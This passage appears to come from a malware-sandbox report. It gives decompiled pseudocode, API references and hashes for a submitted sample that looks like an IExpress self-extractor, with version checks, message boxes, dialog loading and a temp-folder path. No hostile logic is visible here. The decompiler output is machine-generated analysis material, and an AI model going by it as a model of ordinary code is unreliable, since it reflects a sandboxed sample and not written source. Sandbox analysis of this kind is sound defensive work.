                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E003E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E003E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0x3e8a38 & 0x00000001;
                                                                                                                                                                                                      											if(( *0x3e8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                      												_push("cent");
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                      												_t94 = E003E681F(_t115);
                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t98 = E003E67C9(_t124, _t124);
                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                      									_t104 = E003E28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t135 = _v428;
                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t138 = 0x54c;
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0x3e9a40 = _t119;
                                                                                                                                                                                                      						 *0x3e8184 = 1;
                                                                                                                                                                                                      						 *0x3e8180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0x3e9a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0x3e8184 = _t135;
                                                                                                                                                                                                      							 *0x3e8180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E003E44B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E003E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x003e36f9
                                                                                                                                                                                                      0x003e3700
                                                                                                                                                                                                      0x003e370c
                                                                                                                                                                                                      0x003e3716
                                                                                                                                                                                                      0x003e3718
                                                                                                                                                                                                      0x003e371b
                                                                                                                                                                                                      0x003e3721
                                                                                                                                                                                                      0x003e372b
                                                                                                                                                                                                      0x003e373d
                                                                                                                                                                                                      0x003e3745
                                                                                                                                                                                                      0x003e3746
                                                                                                                                                                                                      0x003e3746
                                                                                                                                                                                                      0x003e3749
                                                                                                                                                                                                      0x003e37ab
                                                                                                                                                                                                      0x003e37ad
                                                                                                                                                                                                      0x003e37ae
                                                                                                                                                                                                      0x003e37b3
                                                                                                                                                                                                      0x003e37b8
                                                                                                                                                                                                      0x003e37b8
                                                                                                                                                                                                      0x003e37bf
                                                                                                                                                                                                      0x003e37bf
                                                                                                                                                                                                      0x003e37c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e37cb
                                                                                                                                                                                                      0x003e37cd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e37d5
                                                                                                                                                                                                      0x003e37db
                                                                                                                                                                                                      0x003e37e8
                                                                                                                                                                                                      0x003e37ea
                                                                                                                                                                                                      0x003e37ea
                                                                                                                                                                                                      0x003e37ea
                                                                                                                                                                                                      0x003e37f0
                                                                                                                                                                                                      0x003e37f6
                                                                                                                                                                                                      0x003e3805
                                                                                                                                                                                                      0x003e3817
                                                                                                                                                                                                      0x003e382b
                                                                                                                                                                                                      0x003e3830
                                                                                                                                                                                                      0x003e3836
                                                                                                                                                                                                      0x003e383b
                                                                                                                                                                                                      0x003e383d
                                                                                                                                                                                                      0x003e38eb
                                                                                                                                                                                                      0x003e38eb
                                                                                                                                                                                                      0x003e38f2
                                                                                                                                                                                                      0x003e390c
                                                                                                                                                                                                      0x003e3911
                                                                                                                                                                                                      0x003e3911
                                                                                                                                                                                                      0x003e3913
                                                                                                                                                                                                      0x003e394d
                                                                                                                                                                                                      0x003e394d
                                                                                                                                                                                                      0x003e394f
                                                                                                                                                                                                      0x003e38a9
                                                                                                                                                                                                      0x003e38a9
                                                                                                                                                                                                      0x003e38b0
                                                                                                                                                                                                      0x003e38b2
                                                                                                                                                                                                      0x003e38b9
                                                                                                                                                                                                      0x003e38bb
                                                                                                                                                                                                      0x003e38c1
                                                                                                                                                                                                      0x003e3975
                                                                                                                                                                                                      0x003e38c7
                                                                                                                                                                                                      0x003e38de
                                                                                                                                                                                                      0x003e38e0
                                                                                                                                                                                                      0x003e38e0
                                                                                                                                                                                                      0x003e397b
                                                                                                                                                                                                      0x003e397d
                                                                                                                                                                                                      0x003e39a9
                                                                                                                                                                                                      0x003e397f
                                                                                                                                                                                                      0x003e3982
                                                                                                                                                                                                      0x003e398b
                                                                                                                                                                                                      0x003e398d
                                                                                                                                                                                                      0x003e398f
                                                                                                                                                                                                      0x003e399f
                                                                                                                                                                                                      0x003e39a1
                                                                                                                                                                                                      0x003e3991
                                                                                                                                                                                                      0x003e3991
                                                                                                                                                                                                      0x003e3991
                                                                                                                                                                                                      0x003e398f
                                                                                                                                                                                                      0x003e39af
                                                                                                                                                                                                      0x003e39b6
                                                                                                                                                                                                      0x003e3a0f
                                                                                                                                                                                                      0x003e3a0f
                                                                                                                                                                                                      0x003e3a11
                                                                                                                                                                                                      0x003e3a13
                                                                                                                                                                                                      0x003e3a19
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39b8
                                                                                                                                                                                                      0x003e39b8
                                                                                                                                                                                                      0x003e39ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39bc
                                                                                                                                                                                                      0x003e39bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39c3
                                                                                                                                                                                                      0x003e39c9
                                                                                                                                                                                                      0x003e39ce
                                                                                                                                                                                                      0x003e39d0
                                                                                                                                                                                                      0x003e39e3
                                                                                                                                                                                                      0x003e39e5
                                                                                                                                                                                                      0x003e39e6
                                                                                                                                                                                                      0x003e39f1
                                                                                                                                                                                                      0x003e39f7
                                                                                                                                                                                                      0x003e39fa
                                                                                                                                                                                                      0x003e3a01
                                                                                                                                                                                                      0x003e3a04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3a06
                                                                                                                                                                                                      0x003e3a09
                                                                                                                                                                                                      0x003e3a09
                                                                                                                                                                                                      0x003e3a0b
                                                                                                                                                                                                      0x003e3a0b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3a09
                                                                                                                                                                                                      0x003e39fc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39fc
                                                                                                                                                                                                      0x003e39d3
                                                                                                                                                                                                      0x003e39d8
                                                                                                                                                                                                      0x003e39da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39dc
                                                                                                                                                                                                      0x003e39b6
                                                                                                                                                                                                      0x003e3955
                                                                                                                                                                                                      0x003e395b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3961
                                                                                                                                                                                                      0x003e3963
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3969
                                                                                                                                                                                                      0x003e3969
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3969
                                                                                                                                                                                                      0x003e3915
                                                                                                                                                                                                      0x003e3915
                                                                                                                                                                                                      0x003e391b
                                                                                                                                                                                                      0x003e391f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e392d
                                                                                                                                                                                                      0x003e3933
                                                                                                                                                                                                      0x003e3938
                                                                                                                                                                                                      0x003e393a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3940
                                                                                                                                                                                                      0x003e3946
                                                                                                                                                                                                      0x003e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38f2
                                                                                                                                                                                                      0x003e3843
                                                                                                                                                                                                      0x003e3845
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e384b
                                                                                                                                                                                                      0x003e384d
                                                                                                                                                                                                      0x003e3883
                                                                                                                                                                                                      0x003e3885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e389a
                                                                                                                                                                                                      0x003e389e
                                                                                                                                                                                                      0x003e389e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38a0
                                                                                                                                                                                                      0x003e38a0
                                                                                                                                                                                                      0x003e38a2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38a4
                                                                                                                                                                                                      0x003e384f
                                                                                                                                                                                                      0x003e3851
                                                                                                                                                                                                      0x003e3857
                                                                                                                                                                                                      0x003e386e
                                                                                                                                                                                                      0x003e3877
                                                                                                                                                                                                      0x003e387b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3881
                                                                                                                                                                                                      0x003e3859
                                                                                                                                                                                                      0x003e385c
                                                                                                                                                                                                      0x003e3862
                                                                                                                                                                                                      0x003e3866
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38f4
                                                                                                                                                                                                      0x003e38f4
                                                                                                                                                                                                      0x003e38f5
                                                                                                                                                                                                      0x003e38fb
                                                                                                                                                                                                      0x003e3901
                                                                                                                                                                                                      0x003e3901
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e390a
                                                                                                                                                                                                      0x003e374b
                                                                                                                                                                                                      0x003e374e
                                                                                                                                                                                                      0x003e375c
                                                                                                                                                                                                      0x003e3764
                                                                                                                                                                                                      0x003e3769
                                                                                                                                                                                                      0x003e376e
                                                                                                                                                                                                      0x003e3771
                                                                                                                                                                                                      0x003e379c
                                                                                                                                                                                                      0x003e379f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e37a3
                                                                                                                                                                                                      0x003e37a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e37a4
                                                                                                                                                                                                      0x003e3773
                                                                                                                                                                                                      0x003e3777
                                                                                                                                                                                                      0x003e3778
                                                                                                                                                                                                      0x003e377f
                                                                                                                                                                                                      0x003e3781
                                                                                                                                                                                                      0x003e378e
                                                                                                                                                                                                      0x003e378e
                                                                                                                                                                                                      0x003e3794
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3794
                                                                                                                                                                                                      0x003e3783
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3785
                                                                                                                                                                                                      0x003e378c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e378c
                                                                                                                                                                                                      0x003e3750
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e372d
                                                                                                                                                                                                      0x003e372d
                                                                                                                                                                                                      0x003e396b
                                                                                                                                                                                                      0x003e396b
                                                                                                                                                                                                      0x003e396c
                                                                                                                                                                                                      0x003e396e
                                                                                                                                                                                                      0x003e396f
                                                                                                                                                                                                      0x003e3a1e
                                                                                                                                                                                                      0x003e3a1e
                                                                                                                                                                                                      0x003e3a22
                                                                                                                                                                                                      0x003e3a27
                                                                                                                                                                                                      0x003e3a3e
                                                                                                                                                                                                      0x003e3a3e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 003E3723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 003E39C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 003E39F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: cb29e0f5dc0b36e1baae0369148154876155e369ad5478fb91f9843368a0a4bc
                                                                                                                                                                                                      • Instruction ID: 2505d2fd4f24c56bc8d58510cd8da895d4e5f36cbcd4faf2a8a1b72580d222b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb29e0f5dc0b36e1baae0369148154876155e369ad5478fb91f9843368a0a4bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3391D271E012B49BDB778B16CD897EA77A5AF45304F1603A9E8499B2C1D7718F80CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                                      			E003E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0x3e9a3c; // 0x3e0000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E003E44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t5 =  &_a16; // 0x3e2ee8
                                                                                                                                                                                                      					_t24 =  *_t5;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x003e651f
                                                                                                                                                                                                      0x003e652a
                                                                                                                                                                                                      0x003e6534
                                                                                                                                                                                                      0x003e656b
                                                                                                                                                                                                      0x003e6577
                                                                                                                                                                                                      0x003e657c
                                                                                                                                                                                                      0x003e657c
                                                                                                                                                                                                      0x003e6536
                                                                                                                                                                                                      0x003e653e
                                                                                                                                                                                                      0x003e6542
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6544
                                                                                                                                                                                                      0x003e6547
                                                                                                                                                                                                      0x003e654c
                                                                                                                                                                                                      0x003e6549
                                                                                                                                                                                                      0x003e6549
                                                                                                                                                                                                      0x003e6549
                                                                                                                                                                                                      0x003e655e
                                                                                                                                                                                                      0x003e6560
                                                                                                                                                                                                      0x003e6569
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6569
                                                                                                                                                                                                      0x003e6542
                                                                                                                                                                                                      0x003e6587

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID: .>
                                                                                                                                                                                                      • API String ID: 1214682469-777486363
                                                                                                                                                                                                      • Opcode ID: dce79a95776535d5fd4be20d5bf5ca8ae775f43081e06bbb041ff770e45c052d
                                                                                                                                                                                                      • Instruction ID: 2ca6b626c3f55bf767d46ef265839ff3c07415e5f6d71844c3d36ef52c06dcfa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dce79a95776535d5fd4be20d5bf5ca8ae775f43081e06bbb041ff770e45c052d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B012B722005A9BBCB225F5A9C49DBB766CEB9A3A1F010325FE01971D0D771DD108AA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E003E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E003E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
